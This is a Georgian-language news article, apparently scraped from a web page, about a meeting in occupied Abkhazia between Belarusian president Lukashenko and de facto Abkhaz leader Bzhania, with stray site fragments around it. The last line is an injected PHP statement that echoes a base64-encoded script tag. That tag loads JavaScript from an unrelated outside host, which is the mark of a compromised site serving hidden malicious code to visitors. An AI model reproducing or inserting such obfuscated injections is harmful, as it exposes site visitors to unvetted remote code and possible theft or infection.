celsiusi
ავერსი საქკაბელი
ოკუპირებელი აფხაზეთის ქალაქ ბიჭვინთაში ბელარუსის პრეზიდენტ ალექსანდრ ლუკაშენკოსა და ოკუპირებული აფხაზეთის დე ფაქტო პრეზიდენტ ასლან ბჟანიას შეხვედრა გაიმართა.
 
აფხაზეთის სეპარატისტული ხელისუფლების ინფორმაციით, ასლან ბჟანია ლუკაშენკოს მიესალმა და აღნიშნა, რომ 1996 წელს, დსთ-ს სახელმწიფოთა მეთაურების შეხვედრაზე სწორედ ლუკაშენკომ გამოთქვა წინააღმდეგობა ომის შემდგომი აფხაზეთის ეკონომიკური ბლოკადის მიმართ. თავის მხრივ, ლუკაშენკომ განაცხადა, რომ პრეზიდენტ პუტინთან გუშინ განიხილა აფხაზეთის საკითხი და ორივე ლიდერმა აღნიშნა, რომ აფხაზეთის მიტოვება არ შეიძლება.
 
„საჭიროა დახმარება, რომ ეს აყვავებული მხარე, ხალხი ნორმალურად ცხოვრობდეს“, – განაცხადა ლუკაშენკომ და აღნიშნა, რომ „რუსეთი მზად არის მხარდაჭერისთვის“.
 
ამასთან, ლუკაშენკომ განაცხადა, რომ „აფხაზეთში მისი ჩასვლა არ არის დაკავშირებული რაიმე განსაკუთრებულ ვითარებასთან“.
 
„ჩვენ ნორმალური ვითარება გვაქვს. ჩვენ, ისევე როგორც თქვენ, მშვიდობიანი, კეთილი, შრომისმოყვარე ხალხი ვართ და გვსურს თანხმობაში ცხოვრება“, – აღნიშნა ლუკაშენკომ და გამოთქვა ინიციატივა, „განიხილონ საკითხები, როგორ გააუმჯობესონ ურთიერთობები“.
368
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");